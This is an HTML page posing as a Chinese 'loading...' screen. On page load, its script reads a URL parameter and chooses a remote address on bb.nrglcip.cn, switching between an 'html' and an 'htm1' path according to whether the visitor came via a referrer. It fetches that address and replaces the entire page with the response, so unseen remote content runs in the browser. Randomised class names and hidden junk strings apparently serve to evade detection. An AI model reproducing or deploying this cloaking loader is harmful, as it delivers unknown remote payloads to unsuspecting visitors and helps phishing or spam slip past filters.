<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .vu9wguud9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .vu9wguud9 .n8VrYtAoG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .vu9wguud9 .content {
            line-height: 50px;
            text-align: center
        }

        .vu9wguud9 .img {
            width: 100%
        }

        .vu9wguud9 .OumuSvYs {
            text-align: center
        }

        .vu9wguud9 .OumuSvYs span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .vu9wguud9 .OumuSvYs span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .vu9wguud9 .OumuSvYs span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .vu9wguud9 .OumuSvYs span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .vu9wguud9 .OumuSvYs span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .vu9wguud9 .OumuSvYs span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .vu9wguud9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bOh8Mhgvm(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kmnhU = bOh8Mhgvm('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kmnhU +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kmnhU +".html?a=share";
		}
		
        eVSDogAA=url+"#"+new Date().getTime();
        eVSDogAA && function() {
            $.get(eVSDogAA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>FXauQrO8IALaTbSpKbpOR2hBXK99MIShbn7qxQrDQo3orHkh</a>
<li style='display:none' >YdJ9GbnU7cQBuIcJ3RActHlBv0vHT77P1ENKEuh36xPbP8mqY9QAh8iTCOWCYGJImmUyTOF0</li>
<p  style='display:none'>ARFc7queGv9FRFQb8pW0i</p>
<p  style='display:none'>ARFc7queGv9FRFQb8pW0i</p><div class="vu9wguud9">
    <div class="n8VrYtAoG">
        <div class="OumuSvYs">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>RxxsE1kt6ZCs2pTAIIiKkzm880Khnhs8m1O6zxzDSRl</a>
<span style='display:none'>GUBpRWtRcW2d7nr4diTKHCwjcW0sgbaFKTlLh7</span>
<div style='display:none'>aVsvznGq5sBnYRQDqcyPuISy5KSno5VGZVkxK4</div>
<img  src='' style='display:none'>
<b style='display:none' >aoAN6gYyl12Zr9KEgt8PzyZzwjmOtJ1lS2aipqjNhjQA0tkJZqG2PB0dKQ52mv6bx7RzvfsNb</b></body>
</html>